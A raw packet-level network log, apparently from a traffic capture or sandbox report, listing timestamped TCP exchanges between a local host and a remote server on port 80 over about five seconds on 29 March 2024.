Mar 29, 2024 14:25:36.351648092 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:36.570734024 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:36.570764065 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:36.570871115 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:36.570903063 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:36.570951939 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:36.571135044 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:36.571186066 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:36.572119951 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:36.572133064 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:36.572160959 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:36.572174072 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:36.790380001 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:36.790395021 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:36.790544987 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:36.790591002 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:36.790605068 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:36.790684938 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:36.791743994 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:36.791804075 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:36.791825056 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:36.791906118 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:36.996949911 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:36.996965885 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:36.997045040 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:36.997066975 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:36.997085094 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:36.997107029 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:36.997133970 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:36.998060942 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:36.998074055 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:36.998109102 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:36.998121977 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:37.208648920 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:37.208663940 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:37.208676100 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:37.208688021 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:37.208735943 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:37.208781004 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:37.209218025 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:37.209235907 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:37.209261894 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:37.209292889 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:37.209369898 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:37.209383965 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:37.209414005 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:37.209434986 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:37.427042007 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:37.427056074 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:37.427088976 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:37.427108049 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:37.427112103 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:37.427160025 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:37.427166939 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:37.427510977 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:37.427524090 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:37.427556992 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:37.427572012 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:37.427783012 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:37.427818060 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:37.427823067 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:37.427851915 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:37.643142939 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:37.643166065 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:37.643181086 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:37.643259048 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:37.643307924 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:37.643560886 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:37.643605947 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:37.643785000 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:37.643836021 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:37.643848896 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:37.643867016 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:37.643887043 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:37.856961966 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:37.856980085 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:37.856992960 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:37.857013941 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:37.857037067 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:37.857084036 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:37.857248068 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:37.857305050 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:38.070720911 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:38.070764065 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:38.070811033 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:38.070812941 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:38.070835114 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:38.070847034 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:38.070878983 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:38.070924044 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:38.070950031 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:38.070986032 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:38.294038057 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:38.294061899 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:38.294075966 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:38.294089079 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:38.294123888 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:38.294138908 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:38.294172049 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:38.294178009 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:38.294222116 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:38.520692110 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:38.520716906 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:38.520741940 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:38.520756006 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:38.520770073 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:38.520770073 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:38.520770073 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:38.520802975 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:38.520802975 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:38.520826101 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:38.520904064 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:38.520916939 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:38.520930052 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:38.520941019 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:38.520956993 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:38.520972013 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:38.747291088 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:38.747392893 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:38.747523069 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:38.747565985 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:38.747613907 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:38.747654915 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:38.747709990 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:38.747745991 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:38.747837067 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:38.747874975 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:38.748272896 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:38.748316050 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:38.748358011 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:38.748404026 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:38.748437881 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:38.748486042 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:38.957890987 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:38.957995892 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:38.958677053 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:38.958718061 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:38.958750963 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:38.958765030 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:38.958777905 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:38.958805084 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:38.958821058 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:38.958841085 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:38.958857059 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:38.958895922 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:38.958931923 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:38.958975077 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:38.958990097 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:38.959024906 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:39.174134016 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:39.174153090 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:39.174164057 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:39.174176931 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:39.174190998 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:39.174253941 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:39.174293041 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:39.174396992 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:39.174410105 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:39.174434900 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:39.174443960 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:39.174467087 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:39.174479008 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:39.401546955 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:39.401565075 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:39.401576996 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:39.401592016 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:39.401653051 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:39.401689053 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:39.401990891 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:39.402025938 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:39.402040958 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:39.402040958 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:39.402062893 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:39.402077913 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:39.402098894 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:39.402139902 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:39.623861074 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:39.623877048 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:39.623889923 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:39.623902082 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:39.624044895 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:39.624460936 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:39.624474049 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:39.624496937 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:39.624527931 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:39.624560118 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:39.624613047 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:39.853084087 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:39.853118896 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:39.853131056 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:39.853163004 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:39.853218079 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:39.853270054 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:39.853295088 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:39.853346109 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:39.853384018 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:39.853409052 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:39.853442907 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:39.853518963 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:40.076289892 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:40.076309919 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:40.076354980 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:40.076391935 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:40.076432943 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:40.076466084 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:40.076503038 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:40.076968908 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:40.077037096 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:40.077053070 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:40.077101946 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:40.077318907 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:40.077399015 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:40.077575922 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:40.077653885 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:40.077661991 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:40.077729940 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:40.077873945 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:40.077933073 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:40.302299976 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:40.302318096 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:40.302330017 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:40.302345991 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:40.302391052 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:40.302432060 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:40.302437067 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:40.302475929 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:40.304472923 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:40.304486990 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:40.304527044 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:40.304594994 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:40.304640055 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:40.304775953 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:40.304821968 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:40.523616076 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:40.523633957 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:40.523650885 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:40.523714066 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:40.523778915 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:40.526104927 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:40.526135921 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:40.526148081 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:40.526160955 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:40.526174068 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:40.526200056 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:40.751158953 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:40.751176119 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:40.751262903 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:40.751389980 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:40.751439095 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:40.753211021 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:40.753262043 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:40.753319979 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:40.753385067 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:40.753391027 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:40.753400087 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:40.753424883 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:40.753437042 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:40.979468107 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:40.979489088 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:40.979541063 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:40.979553938 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:40.979595900 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:40.979640007 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:40.980797052 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:40.980811119 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:40.980849981 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:40.980874062 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:40.982130051 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:40.982141972 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:40.982188940 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:40.982208967 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:40.982220888 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:40.982244015 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:40.982269049 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:41.208852053 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:41.208870888 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:41.208925009 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:41.208926916 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:41.208950043 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:41.208971977 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:41.208972931 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:41.209011078 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:41.209861040 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:41.209894896 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:41.209932089 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:41.209960938 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:41.212587118 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:41.212625980 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:41.212636948 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:41.212661982 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:41.412981987 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:41.413124084 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:41.431209087 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:41.431261063 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:41.431265116 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:41.431299925 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:41.431657076 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:41.431709051 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:41.431729078 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:41.431773901 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:41.431783915 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:41.431824923 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:41.431838989 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:41.431874990 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:41.434478045 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:41.434530973 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:41.434537888 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:41.434581995 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:41.434667110 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:41.434714079 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:41.640374899 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:41.640443087 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:41.659290075 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:41.659352064 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:41.660439968 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:41.660451889 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:41.660485983 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:41.660505056 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:41.660648108 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:41.660661936 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:41.660695076 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:41.660706043 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:41.662305117 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:41.662348032 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:41.662353992 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:41.662380934 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:41.662550926 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:41.662564039 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:41.662594080 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:41.852277040 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:41.852420092 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:41.871670961 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:41.871737003 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:41.873044968 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:41.873101950 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:41.873297930 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:41.873349905 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:25:41.874808073 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:41.874838114 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:25:41.874854088 CET	49699	80	192.168.2.7	89.238.170.230
